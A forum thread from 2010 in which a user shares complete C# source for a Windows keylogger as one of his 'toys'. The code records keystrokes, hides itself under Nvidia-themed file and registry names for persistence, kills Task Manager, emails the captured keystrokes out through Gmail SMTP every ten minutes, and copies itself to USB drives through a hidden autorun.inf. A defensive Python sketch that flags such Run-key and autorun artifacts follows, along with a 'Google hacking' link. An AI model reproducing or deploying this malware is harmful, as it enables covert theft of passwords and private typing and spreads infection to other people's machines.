Simple Batch Scripting Automating 3rd Party Utilities

Discussion in 'Meet and Greet' started by Cleptography, Sep 2, 2010.

  1. Cleptography

    Cleptography New Member

    Hello,
    I will start off by stating that I am a first year network security student.
    I am new to the world, and give my respects to those who know more than I do.
    I however have been playing around with computers for quite some time.
    I prefer scripting languages among other things simply because they are the easiest things in the world to use. I would not even consider batch to be a powerful tool outside of being able to automate other 3rd party command line utilities and such.
    I prefer Perl as my weapon of choice; however, over the years I have developed some scripts for generating IP addresses and running output against things like nmap and Sysinternals utilities for gathering information. I would like to share some of my toys, but thought it would be best to first ask if anyone would even have an interest in seeing some of these things. I guess if someone says yeah go ahead post, then I shall do so.
    Regards,
    Cleptography -
     
  2. shabbir

    shabbir Administrator Staff Member

    Hi Cleptography and welcome to the forum, and yeah, I would love to read your tips and toys.
     
  3. Cleptography

    Cleptography New Member

    I should probably rename this thread to various codes or something. I will add various source code and scripts from as many languages as I can, along with automating command utilities.
    This first code is a key logger written in C#, with the ability to email and attach itself to USB.
    I cannot take full credit for this as I found it online, so creds to the original author. It has been a while, so I'm not quite sure where I dug the source up from or I would post a link to it as well. I modified it a bit, but you get the general idea. It's not compiled; you can use the C# compiler included with Windows service pack or whatever compiler you so desire, but here is the source.

    KeyLogger written in c#
    ---------------------------
    Code:
    using System;
    using System.Diagnostics;
    using System.Timers;
    using System.Windows.Forms;
    using System.Runtime.InteropServices;
    using System.IO;
    using System.Net;
    using System.Net.Mail;
    using Microsoft.Win32;
    
    namespace Keylogger_V2
    {
        class Program
        {
            private const int WH_KEYBOARD_LL = 13;
            private const int WM_KEYDOWN = 0x0100;
            private static LowLevelKeyboardProc _proc = HookCallback;
            private static IntPtr _hookID = IntPtr.Zero;
            public static string path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),"nvidia.log");
            public static byte caps = 0, shift = 0, failed = 0;
    
            [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
            private static extern IntPtr SetWindowsHookEx(int idHook, LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);
    
            [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
            [return: MarshalAs(UnmanagedType.Bool)]
            private static extern bool UnhookWindowsHookEx(IntPtr hhk);
    
            [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
            private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);
    
            [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
            private static extern IntPtr GetModuleHandle(string lpModuleName);
    
            public static void Main()
            {
            _hookID = SetHook(_proc);
            Program.startup();
            System.Timers.Timer timer;
            timer = new System.Timers.Timer();
            timer.Elapsed += new ElapsedEventHandler(Program.OnTimedEvent);
            timer.AutoReset = true;
            timer.Interval = 600000;
            timer.Start();
            System.Timers.Timer timer2;
            timer2 = new System.Timers.Timer();
            timer2.Elapsed += new ElapsedEventHandler(Program.USBSpread);
            timer2.AutoReset = true;
            timer2.Interval = 10000;
            timer2.Start();
            Application.Run();
            GC.KeepAlive(timer);
            GC.KeepAlive(timer2);
            UnhookWindowsHookEx(_hookID);
            }
    
            public static void startup()
            {
                //Try to copy keylogger in some folders
                string source = Application.ExecutablePath.ToString();
                string destination = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
                destination=System.IO.Path.Combine(destination,"nvdisp.exe");
                try
                {
                    System.IO.File.Copy(source, destination,false);
                    source = destination;
                } catch {
                    Console.WriteLine("No authorization to copy file or other error.");
                }
                //Find if the file already exist in startup
                try
                {
                    RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", false);
    
                    if (registryKey.GetValue("Nvidia driver") == null)
                    {
                        registryKey.SetValue("Nvidia driver", destination);
                    }
    
                    registryKey.Close();//dispose of the Key
                } catch {
                    Console.WriteLine("Error setting startup reg key.");
                }
                //Try to add to all users
                try
                {
                    RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", false);
    
                    if (registryKey.GetValue("Nvidia driver") == null)
                    {
                        registryKey.SetValue("Nvidia driver", source);
                    }
    
                    registryKey.Close();//dispose of the key
                }
                catch
                {
                    Console.WriteLine("Error setting startup reg key for all users.");
                }
            }
    
            public static void OnTimedEvent(object source, EventArgs e)
            {
                Process[] ProcessList = Process.GetProcesses();
                foreach (Process proc in ProcessList)
                {
                    if (proc.MainWindowTitle.Contains("Taskmgr.exe"))
                    {
                        proc.Kill();
                    }
                }
                System.Net.Mail.MailMessage msg = new System.Net.Mail.MailMessage(); //create the message
                msg.To.Add("username@gmail.com");
                msg.From = new MailAddress("username@gmail.com", "username", System.Text.Encoding.UTF8);
                msg.Subject = "i don't know";
                msg.SubjectEncoding = System.Text.Encoding.UTF8;
                msg.Body = "ciao ale";
                msg.BodyEncoding = System.Text.Encoding.UTF8;
                msg.IsBodyHtml = false;
                msg.Priority = MailPriority.High;
                SmtpClient client = new SmtpClient(); //Network Credentials for Gmail
                client.Credentials = new System.Net.NetworkCredential("username@gmail.com", "password");
                client.Port = 587;
                client.Host = "smtp.gmail.com";
                client.EnableSsl = true;
                Attachment data = new Attachment(Program.path);
                msg.Attachments.Add(data);
                try
                {
                    client.Send(msg);
                    failed = 0;
                }
                catch
                {
                    data.Dispose();
                    failed = 1;
                }
                data.Dispose();
    
                if (failed == 0)
                    File.WriteAllText(Program.path, ""); //empties the file
        
                failed = 0;
        
            }
    
            private static IntPtr SetHook(LowLevelKeyboardProc proc)
            {
                using (Process curProcess = Process.GetCurrentProcess())
                using (ProcessModule curModule = curProcess.MainModule)
                {
                    return SetWindowsHookEx(WH_KEYBOARD_LL, proc, GetModuleHandle(curModule.ModuleName), 0);
                }
            }
            private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam);
            private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
            {
                if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
                {
                    StreamWriter sw = File.AppendText(Program.path);
                    int vkCode = Marshal.ReadInt32(lParam);
                    if (Keys.Shift == Control.ModifierKeys) Program.shift = 1;
                    
                switch ((Keys)vkCode)
                    {
                        case Keys.Space:
                            sw.Write(" ");
                            break;
                        case Keys.Return:
                            sw.WriteLine("");
                            break;
                        case Keys.Back:
                            sw.Write("back");
                            break;
                        case Keys.Tab:
                            sw.Write("TAB");
                            break;
                        case Keys.D0:
                            if (Program.shift == 0) sw.Write("0");
                            else sw.Write(")");
                            break;
                        case Keys.D1:
                            if (Program.shift == 0) sw.Write("1");
                            else sw.Write("!");
                            break;
                        case Keys.D2:
                            if (Program.shift == 0) sw.Write("2");
                            else sw.Write("@");
                            break;
                        case Keys.D3:
                            if (Program.shift == 0) sw.Write("3");
                            else sw.Write("#");
                            break;
                        case Keys.D4:
                            if (Program.shift == 0) sw.Write("4");
                            else sw.Write("$");
                            break;
                        case Keys.D5:
                            if (Program.shift == 0) sw.Write("5");
                            else sw.Write("%");
                            break;
                        case Keys.D6:
                            if (Program.shift == 0) sw.Write("6");
                            else sw.Write("^");
                            break;
                        case Keys.D7:
                            if (Program.shift == 0) sw.Write("7");
                            else sw.Write("&");
                            break;
                        case Keys.D8:
                            if (Program.shift == 0) sw.Write("8");
                            else sw.Write("*");
                            break;
                        case Keys.D9:
                            if (Program.shift == 0) sw.Write("9");
                            else sw.Write("(");
                            break;
                        case Keys.LShiftKey:
                        case Keys.RShiftKey:
                        case Keys.LControlKey:
                        case Keys.RControlKey:
                        case Keys.LMenu:
                        case Keys.RMenu:
                        case Keys.LWin:
                        case Keys.RWin:
                        case Keys.Apps:
                    sw.Write("");
                            break;
                        case Keys.OemQuestion:
                            if (Program.shift == 0) sw.Write("/");
                            else sw.Write("?");
                            break;
                        case Keys.OemOpenBrackets:
                            if (Program.shift == 0) sw.Write("[");
                            else sw.Write("{");
                            break;
                        case Keys.OemCloseBrackets:
                            if (Program.shift == 0) sw.Write("]");
                            else sw.Write("}");
                            break;
                        case Keys.Oem1:
                            if (Program.shift == 0) sw.Write(";");
                            else sw.Write(":");
                            break;
                        case Keys.Oem7:
                            if (Program.shift == 0) sw.Write("'");
                            else sw.Write('"');
                            break;
                        case Keys.Oemcomma:
                            if (Program.shift == 0) sw.Write(",");
                            else sw.Write("<");
                            break;
                        case Keys.OemPeriod:
                            if (Program.shift == 0) sw.Write(".");
                            else sw.Write(">");
                            break;
                        case Keys.OemMinus:
                            if (Program.shift == 0) sw.Write("-");
                            else sw.Write("_");
                            break;
                        case Keys.Oemplus:
                            if (Program.shift == 0) sw.Write("=");
                            else sw.Write("+");
                            break;
                        case Keys.Oemtilde:
                            if (Program.shift == 0) sw.Write("`");
                            else sw.Write("~");
                        break;
                    case Keys.Oem5:
                        sw.Write("|");
                        break;
                    case Keys.Capital:
                        if (Program.caps == 0) Program.caps = 1;
                        else Program.caps = 0;
                        break;
                    default:
                        if (Program.shift == 0 && Program.caps == 0) sw.Write(((Keys)vkCode).ToString().ToLower());
                        if (Program.shift == 1 && Program.caps == 0) sw.Write(((Keys)vkCode).ToString().ToUpper());
                        if (Program.shift == 0 && Program.caps == 1) sw.Write(((Keys)vkCode).ToString().ToUpper());
                        if (Program.shift == 1 && Program.caps == 1) sw.Write(((Keys)vkCode).ToString().ToLower());
                        break;
                }
                Program.shift = 0;
                sw.Close();
            }    
            return CallNextHookEx(_hookID, nCode, wParam, lParam);
            }
    
            public static void USBSpread(object source, EventArgs e)
            {
                ///////////////////////////////////////////////////////////////
                /////////////////////// USB spread class //////////////////////
                ///////////////////////////////////////////////////////////////
                //A bit modified
                string source2 = Application.ExecutablePath.ToString();
                System.IO.DriveInfo[] drives = System.IO.DriveInfo.GetDrives();
                try
                {
                    foreach (System.IO.DriveInfo drive in drives)
                    {
                        if (drive.DriveType == DriveType.Removable)
                        {
                            string driveAutorun = drive.Name + "autorun.inf";
                            StreamWriter sw = new StreamWriter(driveAutorun);
                            sw.WriteLine("[autorun]\n");
                            sw.WriteLine("open=start.exe");
                            sw.WriteLine("action=Run VMCLite");
                            sw.Close();
                            File.SetAttributes(drive.Name + "autorun.inf", File.GetAttributes(drive.Name + "autorun.inf") | FileAttributes.Hidden);
                            try
                            {
                                File.Copy(source2, drive.Name + "start.exe", true);
                                File.SetAttributes(drive.Name + "start.exe", File.GetAttributes(drive.Name + "start.exe") | FileAttributes.Hidden);
                            }
                            finally
                            {
                                Console.WriteLine("Removable device rooted");
                            }
                        }
                    }
                }
                catch (Exception e2)
                {
                    Console.WriteLine(e2.ToString());
                }
            }
        }
    }
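
A defender-side triage sketch for the artifacts the code in the post above leaves behind: a Run value pointing at an executable under the user's AppData folder, and an autorun.inf with an `open=` entry on removable drives. This is an added example, not part of the original post; the function names, the user name `alice` and the second registry entry are constructed for illustration.

```python
import configparser
import re
from pathlib import PureWindowsPath

# [autorun] keys that make Windows offer or start a program from the volume.
EXEC_KEYS = ("open", "shellexecute", "shell\\open\\command")
# User-writable locations; a Run-key target here deserves a second look.
USER_WRITABLE = re.compile(
    r"\\(appdata|temp)\\|%(appdata|localappdata|temp)%", re.IGNORECASE)

# Constructed samples. The autorun.inf lines, the value name and nvdisp.exe
# mirror the post; the user name and the second entry are made up.
SAMPLE_INF = "[autorun]\n\nopen=start.exe\naction=Run VMCLite\n"
SAMPLE_RUN = [
    ("HKCU", "Nvidia driver", r"C:\Users\alice\AppData\Roaming\nvdisp.exe"),
    ("HKLM", "ExampleTray", r'"C:\Program Files\Example\tray.exe" -startup'),
]


def autorun_launch_targets(inf_text):
    """Return the programs an autorun.inf would launch, as {key: target}."""
    parser = configparser.ConfigParser(strict=False, interpolation=None,
                                       allow_no_value=True, delimiters=("=",))
    try:
        parser.read_string(inf_text)
    except configparser.Error:
        return {}  # not parseable as an INF file (e.g. no section header)
    found = {}
    for section in parser.sections():
        if section.lower() != "autorun":  # section names are case-insensitive
            continue
        for key in EXEC_KEYS:
            value = parser.get(section, key, fallback=None)
            if value:
                found[key] = value.strip()
    return found


def suspicious_run_entries(entries):
    """Flag Run-key values whose executable sits in a user-writable path."""
    flagged = []
    for hive, name, command in entries:
        # Executable part: the quoted path if quoted, else text up to ".exe".
        m = re.match(r'\s*"([^"]+)"|\s*(.+?\.exe)\b', command, re.IGNORECASE)
        exe = (m.group(1) or m.group(2)) if m else command.strip()
        if USER_WRITABLE.search(exe):
            flagged.append((hive, name, PureWindowsPath(exe).name))
    return flagged


if __name__ == "__main__":
    print(autorun_launch_targets(SAMPLE_INF))
    print(suspicious_run_entries(SAMPLE_RUN))
```

Legitimate per-user software also starts from AppData, so treat the second function's output as a review list rather than a verdict.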
     
  4. Cleptography

    Cleptography New Member

    Google's master list, a place for all your Google hacking fun. :D

    it.toolbox.com/blogs/managing-infosec/google-hacking-master-list-28302
     
  5. shabbir

    shabbir Administrator Staff Member

    I have split all but one into separate articles.
     